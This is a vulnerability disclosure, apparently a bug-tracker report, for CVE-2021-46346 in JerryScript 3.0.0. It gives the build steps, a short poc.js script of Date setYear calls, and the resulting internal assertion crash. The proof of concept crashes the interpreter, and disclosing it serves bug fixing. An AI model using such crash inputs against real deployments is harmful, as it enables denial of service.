Headline
CVE-2021-46346: Assertion 'local_tza == ecma_date_local_time_zone_adjustment (date_value)' failed at jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-date-prototype.c(ecma_builtin_date_prototype_dispatch_set)
The assertion 'local_tza == ecma_date_local_time_zone_adjustment (date_value)' fails at /jerry-core/ecma/builtin-objects/ecma-builtin-date-prototype.c(ecma_builtin_date_prototype_dispatch_set):421 in JerryScript 3.0.0.
JerryScript revision
Commit: a6ab5e9
Version: v3.0.0
Build platform
Ubuntu 18.04.5 LTS (Linux 4.19.128-microsoft-standard x86_64)
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
Build steps
python ./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-g --strip=off --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --stack-limit=20
Test case: poc.js
var date;
date = new Date(1970, 0);
date.setYear((date.getFullYear(), 1900, 'y = -0'));
date.setYear(-0);
date.setYear(-0);
date.setYear(-0);
assert.sameValue(date.getFullYear(), 1900, 'y = -0');
date = new Date(1970, 0);
date.setYear(0);
assert.sameValue(date.getFullYear(), 1900, 'y = 0');
date = new Date(1970, 0);
date.setYear(50);
assert.sameValue(date.getFullYear(), 1950, 'y = 50');
date = new Date(1970, 0);
date.setYear(50.999999);
assert.sameValue(date.getFullYear(), 1950, 'y = 50.999999');
date = new Date(1970, 0);
date.setYear(99);
assert.sameValue(date.getFullYear(), 1999, 'y = 99');
date = new Date(1970, 0);
date.setYear(99.999999);
assert.sameValue(date.getFullYear(), 1999, 'y = 99.999999');
Execution steps & Output
$ ./jerryscript/build/bin/jerry poc.js
ICE: Assertion 'local_tza == ecma_date_local_time_zone_adjustment (date_value)' failed at jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-date-prototype.c(ecma_builtin_date_prototype_dispatch_set):421.
Error: ERR_FAILED_INTERNAL_ASSERTION
[1] 309 abort jerry poc.js
Credits: Found by OWL337 team.